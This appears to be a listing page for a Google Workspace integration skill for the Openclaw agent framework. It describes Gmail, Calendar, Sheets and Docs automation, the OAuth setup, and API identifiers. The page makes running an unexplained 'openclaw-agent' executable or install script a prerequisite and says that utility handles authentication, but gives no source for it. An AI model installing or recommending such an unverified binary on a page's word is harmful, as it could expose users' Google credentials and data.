What is Google Workspace?

The Google Workspace skill empowers your AI agent to interact directly with the entire Google productivity suite. By leveraging this Openclaw Skills integration, developers can automate repetitive office tasks such as sending emails, scheduling meetings, and synchronizing data across spreadsheets and documents. It acts as a CLI-driven gateway for managing professional workflows without leaving the terminal or agent environment.

This skill is essential for building autonomous agents that need to communicate with team members, track project deadlines in calendars, or generate reports in Google Sheets. It requires the openclaw-agent utility to handle secure authentication and API requests effectively, ensuring that your automated workflows remain secure and reliable.

Google Workspace Use Cases

  • Automated email triage and response handling in Gmail.
  • Dynamic meeting scheduling and calendar management for teams.
  • Real-time data logging and report generation in Google Sheets.
  • Programmatic creation and editing of project documentation in Google Docs.
  • Synchronizing and searching professional contacts across the organization.

How Google Workspace Works

  1. Initialize the environment by running the openclaw-agent background utility.
  2. Configure a Google Cloud Project and enable the required Workspace APIs (Gmail, Calendar, Sheets, Docs, People API).
  3. Authenticate using OAuth 2.0 credentials to generate a secure local token (token.pickle).
  4. The AI agent executes Python-based commands to interact with specific Google services using the Openclaw Skills framework.
  5. Data is exchanged between the local environment and Google servers via encrypted API calls to perform actions like sending mail or updating sheets.

Google Workspace Setup

Prerequisites

You must have openclaw-agent running. Windows users should run the executable, while macOS users use the provided terminal installation script.

1. Install Dependencies

pip install google-api-python-client google-auth-httplib2 google-auth-oauthlib

2. Google Cloud Configuration

  1. Create a project in the Google Cloud Console.
  2. Enable the APIs: Gmail, Calendar, Sheets, Docs, and People API.
  3. Create OAuth 2.0 credentials (Desktop app) and download credentials.json to your directory.

3. Authentication

Run your first command to trigger the browser-based OAuth flow. This will generate a token.pickle file for subsequent requests.

Google Workspace Data Schema & Taxonomy

The skill organizes data using standard Google API identifiers and metadata structures:

Service Identifier Type Access Method
Gmail Message ID mail.google.com/mail/u/0/#inbox/ID
Calendar Event ID API Response event['id']
Sheets Spreadsheet ID URL: docs.google.com/spreadsheets/d/ID/
Docs Document ID URL: docs.google.com/document/d/ID/
Drive File ID URL: drive.google.com/file/d/ID/
Contacts Resource Name people/me/connections/ID

Google Workspace Advanced Features

  • Multi-service integration allowing for cross-app workflows (e.g., parsing a Gmail invoice to a Google Sheet).
  • Batch update support for Google Docs to efficiently insert or replace text at scale.
  • Advanced search filtering for Gmail using query parameters like is:unread or has:attachment.
  • Support for Google Drive file operations including media uploads and chunked downloads.
  • Automated token refresh logic via the Openclaw Skills authentication helper.
